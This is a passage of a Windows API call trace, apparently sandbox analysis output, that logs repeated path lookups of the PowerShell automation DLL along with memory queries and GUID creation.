lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.265] GetLastError () returned 0x0 [0145.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.265] GetLastError () returned 0x0 [0145.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.346] GetLastError () returned 0x0 [0145.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.346] GetLastError () returned 0x0 [0145.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.346] GetLastError () returned 0x0 [0145.346] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x267a1ad6, Data2=0x620, Data3=0x41b9, Data4=([0]=0x87, [1]=0xc5, [2]=0x5a, [3]=0x7d, [4]=0xab, [5]=0x16, [6]=0x4c, [7]=0xae))) returned 0x0 [0145.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.346] GetLastError () returned 0x0 [0145.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.346] GetLastError () returned 0x0 [0145.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.346] GetLastError () returned 0x0 [0145.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.347] GetLastError () returned 0x0 [0145.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.347] GetLastError () returned 0x0 [0145.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.347] GetLastError () returned 0x0 [0145.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.347] GetLastError () returned 0x0 [0145.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.347] GetLastError () returned 0x0 [0145.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.347] GetLastError () returned 0x0 [0145.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.347] GetLastError () returned 0x0 [0145.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.348] GetLastError () returned 0x0 [0145.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.348] GetLastError () returned 0x0 [0145.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.348] GetLastError () returned 0x0 [0145.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.348] GetLastError () returned 0x0 [0145.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.348] GetLastError () returned 0x0 [0145.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.348] GetLastError () returned 0x0 [0145.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.348] GetLastError () returned 0x0 [0145.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.348] GetLastError () returned 0x0 [0145.349] VirtualQuery (in: lpAddress=0x2dd074, lpBuffer=0x2de074, dwLength=0x1c | out: lpBuffer=0x2de074*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.350] VirtualQuery (in: lpAddress=0x2dd0b0, lpBuffer=0x2de0b0, dwLength=0x1c | out: lpBuffer=0x2de0b0*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.350] GetLastError () returned 0x0 [0145.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.350] GetLastError () returned 0x0 [0145.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.350] GetLastError () returned 0x0 [0145.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.350] GetLastError () returned 0x0 [0145.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.350] GetLastError () returned 0x0 [0145.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.350] GetLastError () returned 0x0 [0145.350] VirtualQuery (in: lpAddress=0x2dd3e0, lpBuffer=0x2de3e0, dwLength=0x1c | out: lpBuffer=0x2de3e0*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.351] GetLastError () returned 0x0 [0145.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.351] GetLastError () returned 0x0 [0145.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.351] GetLastError () returned 0x0 [0145.351] VirtualQuery (in: lpAddress=0x2dd3e0, lpBuffer=0x2de3e0, dwLength=0x1c | out: lpBuffer=0x2de3e0*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.351] GetLastError () returned 0x0 [0145.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.351] GetLastError () returned 0x0 [0145.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.351] GetLastError () returned 0x0 [0145.351] VirtualQuery (in: lpAddress=0x2dd3e0, lpBuffer=0x2de3e0, dwLength=0x1c | out: lpBuffer=0x2de3e0*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.352] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.352] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.353] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.353] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.353] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.353] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.353] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.353] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.353] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.354] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.386] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.386] VirtualQuery (in: lpAddress=0x2dd21c, lpBuffer=0x2de21c, dwLength=0x1c | out: lpBuffer=0x2de21c*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.387] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.387] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.387] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.388] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.388] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x5447bd8c, Data2=0xd0b0, Data3=0x4524, Data4=([0]=0xb9, [1]=0x61, [2]=0x46, [3]=0xc1, [4]=0xe1, [5]=0x5, [6]=0x74, [7]=0xc5))) returned 0x0 [0145.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.388] GetLastError () returned 0x0 [0145.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.388] GetLastError () returned 0x0 [0145.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.388] GetLastError () returned 0x0 [0145.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.388] GetLastError () returned 0x0 [0145.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.389] GetLastError () returned 0x0 [0145.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.389] GetLastError () returned 0x0 [0145.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.389] GetLastError () returned 0x0 [0145.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.389] GetLastError () returned 0x0 [0145.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.389] GetLastError () returned 0x0 [0145.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.389] GetLastError () returned 0x0 [0145.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.389] GetLastError () returned 0x0 [0145.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.389] GetLastError () returned 0x0 [0145.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: 